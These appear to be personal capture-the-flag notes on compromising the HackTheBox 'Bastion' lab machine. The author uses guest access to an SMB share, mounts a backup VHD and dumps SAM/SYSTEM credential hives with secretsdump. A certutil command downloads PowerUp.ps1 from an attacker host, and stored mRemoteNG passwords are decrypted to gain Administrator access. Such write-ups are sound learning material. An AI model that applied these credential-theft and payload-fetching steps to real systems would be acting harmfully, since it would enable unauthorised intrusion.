Search

Bastion (HackTheBox) (mRemoteNG)

NMAP scan brought back SMB and Httpapi 2.0 and server 2016

To list SMB directories:

SMB login to admin, c, and IPC. Only IPC connects. Can’t seem to do much with it.

WHAT I MISSED:

dont need to provide passwords

Connect to backups?:

smbclient \\\\10.10.10.134\\Backups

We see note.txt and get it. To view the note go to a new terminal and:

cat note.txt

It doesn’t let me into backup

What I did wrong:

I forgot quotes around folder name when it had spaces.

cd "Backup 2019-02-22 124351"

Found VHD files (virtual hard disk) that are too big to transfer. We need to mount them:

Resource: https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25

After doing the gets, make a folder in ~/mnt called remote

To mount that remote share:

sudo mount -t cifs -o 'rw,username=guest' //10.10.10.134/Backups /mnt/remote/backups

cd into backups:

cd /mnt/remote/backups

Go to Bastion folder:

cd /home/kali/Desktop/HackTheBox/Bastion

mount the VHD:

guestmount -a '/mnt/remote/backups/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd' -m /dev/sda1 --ro /home/kali/Desktop/HackTheBox/Bastion

look for credentials or things like that in folders and files.

Look for SAM folder

C:\Windows\System32\config

grab:

SAM
SECURITY
SYSTEM

copy them over:

cp SAM /home/kali/Desktop/HackTheBox/Bastion SAM
same for SECURITY
same for SYSTEM

Analyze them with secretsdump:

cd to SAM folder:

cd /home/kali/Desktop/HackTheBox/"Bastion SAM"
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
image

it gives us a password for unknown user. We can try logging into ssh with it

ssh l4mpje@10.10.10.134
bureaulampje
certutil -urlcache -f http://10.10.14.13/PowerUp.ps1 PowerUp.ps1

They all get blocked because of antivirus. What programs are installed? Check installation dates!

mRemoteNG?

has exploit

where is the file stored?

Google:

  • mRemoteNG where are passwords stored
C:\Users\UserName\AppData\Roaming\mRemoteNG\confCons.xml
C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml

copy over the xml file and run decrypt on it:

cd /tmp/CVE-2023-30367 #autotab

Usage:

python3 mremoteng_decrypt.py -f bastionconfCon.txt

This doesn’t seem to work but you can just do a password (trying with the Admin password from the XML):

python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

Output:

Password: thXLHM96BeKL0ER2

login as admin:

ssh Administrator@10.10.10.134
thXLHM96BeKL0ER2

the Papi/Server vuln seem to be PrivEsc not initial access.

Dirbuster?

There are no web pages for dirbuster

It seems to be a Samba/SMB exploit. How did he do it?